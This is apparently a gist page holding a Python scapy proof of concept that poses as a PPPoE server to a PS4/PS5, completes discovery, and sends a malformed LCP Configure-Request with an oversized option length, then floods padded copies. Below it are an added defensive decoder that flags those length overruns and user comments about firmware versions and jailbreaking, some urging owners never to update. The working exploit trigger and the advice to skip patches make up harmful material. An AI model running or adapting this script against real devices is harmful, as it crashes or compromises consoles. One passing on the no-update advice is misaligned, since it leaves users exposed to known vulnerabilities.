```python
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

source = b"\xXX\xXX\xXX\xXX\xXX\xXX"       # MAC address of your adapter on the PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX"  # MAC address of the LAN port on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2"  # get via "ipconfig /all", or eth0 or similar on Linux

# Discovery phase: wait for the console's PADI and reuse its tag value so the
# replies below are accepted (it is echoed back as a Host-Uniq tag, type 0x0103).
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value

# PADO: ethertype 0x8863, code 0x07, session 0x0000, length 12, one 8-byte Host-Uniq tag
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# Wait for the console's PADR, then answer with PADS (code 0x65) assigning session 0x0001
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

# Session phase (ethertype 0x8864): wait for the first PPP frame, then send an LCP
# Configure-Request (protocol 0xc021, code 0x01, id 0x01, length 7) carrying a single
# option whose length byte (0xff) is larger than the bytes actually present
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
hexdump(packet)  # hexdump() prints by itself; wrapping it in print() only adds a stray "None"

# The same LCP frame padded with 0xff bytes, sent repeatedly
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256  # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)
```
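Added here as a defender-side companion to the script above; it is not part of the gist. It is a dependency-free decoder for the three kinds of frames the script emits (PADO, PADS/PPPoE discovery, and the PPPoE-session LCP Configure-Request) that checks every length field against the bytes really present, which is exactly the check a PPPoE client's LCP option parser must make before trusting an option's length byte. The MAC addresses and the Host-Uniq value are constructed samples (the gist leaves the MACs as `\xXX` placeholders and takes the tag value from the console's PADI); the frame builder, the `check_lcp` and `parse_frame` names, and the finding labels are mine.

```python
# Added example (not from the gist): a dependency-free decoder for the frames the
# script above emits, checking every length field against the bytes really present.
import struct

ETHERTYPE_PPPOE_DISCOVERY = 0x8863
ETHERTYPE_PPPOE_SESSION = 0x8864
PPP_PROTO_LCP = 0xC021
PPPOE_CODES = {0x09: "PADI", 0x07: "PADO", 0x19: "PADR",
               0x65: "PADS", 0xA7: "PADT", 0x00: "SESSION"}
LCP_CODES = {1: "Configure-Request", 2: "Configure-Ack",
             3: "Configure-Nak", 4: "Configure-Reject"}

# Constructed sample values; the gist leaves the MACs as \xXX placeholders and
# takes the Host-Uniq value from the console's PADI.
SAMPLE_PC = bytes.fromhex("020000000001")
SAMPLE_CONSOLE = bytes.fromhex("020000000002")
SAMPLE_HOST_UNIQ = bytes.fromhex("0011223344556677")


def parse_tags(data):
    """Decode PPPoE discovery tags: type (2 bytes), length (2 bytes), value."""
    tags, off = [], 0
    while off + 4 <= len(data):
        ttype, tlen = struct.unpack("!HH", data[off:off + 4])
        tags.append({"type": ttype, "declared_length": tlen,
                     "value": data[off + 4:off + 4 + tlen]})
        off += 4 + tlen
    return tags


def check_lcp(payload):
    """Validate LCP header and option lengths; return (summary, findings)."""
    if len(payload) < 4:
        return {}, ["lcp_header_truncated"]
    code, ident, lcp_len = struct.unpack("!BBH", payload[:4])
    summary = {"code": LCP_CODES.get(code, code), "id": ident,
               "declared_length": lcp_len, "actual_length": len(payload), "options": []}
    findings = ["lcp_length_exceeds_frame"] if lcp_len > len(payload) else []
    # Only bytes covered by the declared LCP length may hold options.
    region = payload[4:min(lcp_len, len(payload))]
    off = 0
    while off < len(region):
        if off + 2 > len(region):
            findings.append("option_header_truncated")
            break
        otype, olen = region[off], region[off + 1]
        summary["options"].append({"type": otype, "declared_length": olen})
        if olen < 2:                      # would loop forever if accepted
            findings.append(f"option_0x{otype:02x}_length_too_small")
            break
        if olen > len(region) - off:      # option claims bytes that are not there
            findings.append(f"option_0x{otype:02x}_length_overrun")
            break
        off += olen
    return summary, findings


def parse_frame(frame):
    """Decode Ethernet -> PPPoE (-> PPP -> LCP); raise ValueError if not PPPoE."""
    if len(frame) < 20:
        raise ValueError("frame shorter than Ethernet + PPPoE headers")
    ethertype, vertype, code, session, length = struct.unpack("!HBBHH", frame[12:20])
    if ethertype not in (ETHERTYPE_PPPOE_DISCOVERY, ETHERTYPE_PPPOE_SESSION):
        raise ValueError(f"not PPPoE: ethertype 0x{ethertype:04x}")
    info = {"dst": frame[:6].hex(":"), "src": frame[6:12].hex(":"),
            "code": PPPOE_CODES.get(code, code), "session": session,
            "declared_length": length, "actual_length": len(frame) - 20, "findings": []}
    if length > len(frame) - 20:
        info["findings"].append("pppoe_length_exceeds_frame")
    body = frame[20:20 + length]          # trust the declared length, never beyond it
    if ethertype == ETHERTYPE_PPPOE_DISCOVERY:
        info["tags"] = parse_tags(body)
    elif len(body) < 2:
        info["findings"].append("ppp_protocol_truncated")
    else:
        info["ppp_protocol"] = struct.unpack("!H", body[:2])[0]
        if info["ppp_protocol"] == PPP_PROTO_LCP:
            info["lcp"], lcp_findings = check_lcp(body[2:])
            info["findings"].extend(lcp_findings)
    return info


def sample_frames():
    """The script's frames rebuilt with the sample values, plus a well-formed LCP frame."""
    hdr = SAMPLE_CONSOLE + SAMPLE_PC
    return {
        "pado": hdr + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + SAMPLE_HOST_UNIQ,
        "lcp_short": hdr + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff",
        "lcp_padded": hdr + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256,
        # Configure-Request with a single MRU option (type 1, length 4, value 1500)
        "lcp_ok": hdr + b"\x88\x64\x11\x00\x00\x01\x00\x0a\xc0\x21\x01\x01\x00\x08\x01\x04\x05\xdc",
    }


if __name__ == "__main__":
    for name, frame in sample_frames().items():
        r = parse_frame(frame)
        print(name, r["code"], r.get("lcp", {}).get("code", ""), r["findings"] or "ok")
```

Run it and the two LCP frames from the script are reported with `option_0xab_length_overrun` (the short one additionally with the PPPoE and LCP length fields exceeding the frame), while the PADO and the MRU control frame come back clean. The design point is the `region` slice in `check_lcp`: options are only ever read from the bytes covered by the declared LCP length, and an option length is compared against what remains of that slice rather than taken at face value, so padding the frame with extra bytes (as the script's last loop does) does not make the oversized option acceptable.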
Does the cable need to be straight or reverse?
PS4/5 can do Auto MDI-X, so it doesn't matter.
Proof of concept.
Will 11.02 be available?
No, this bug has been patched in 11.02.
I've made a video showing how to set this up from scratch if anyone is interested.
If anyone is curious, it is working on PS5 7.61.
Zero zero zero zero.
I tried it on PS3 and it freezes (sometimes) on the boot screen.
Received 2 packets, got 1 answers, remaining 0 packets
Works only after setting up PPPoE for the first time or after changing the username/password there. But yeah, just tested with 11.00 and it does work.
We have more info on HackerOne about this vuln: https://hackerone.com/reports/2177925 . Thanks to TheFl0w.
My PS5 software version is 23.02-08 20.02.06-00.00.00.01. Am I still able to jailbreak my console, or did I miss the opportunity?
You're still in scope for a future jailbreak; wait for an exploit and don't update your console.
Is it confirmed that it works on both 8.20 versions?
OK, I will wait. I am not going to update my console ever.
What do you mean, "works on both 8.20 versions"? Are you asking or telling us?
I was asking @unaigonzalezz because there are two different 8.20 FW versions.
There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.
Sorry that I didn't know more about jailbreaking stuff. In the past I used 9.00 on my PS4 Slim, and after a long, long time I got one more chance to use a jailbreak, and hopefully when TheFlow says 8.20 it includes all the versions.
I actually don't know, but if it is .02 it's a small change, so I don't think it is the patch for the error; I'm not truly sure, though, so the best thing you guys can do is test this script: if it crashes your console, the future exploit should work too.
Bro, it's a PoC, meaning proof of concept, not a full jailbreak; you have to wait!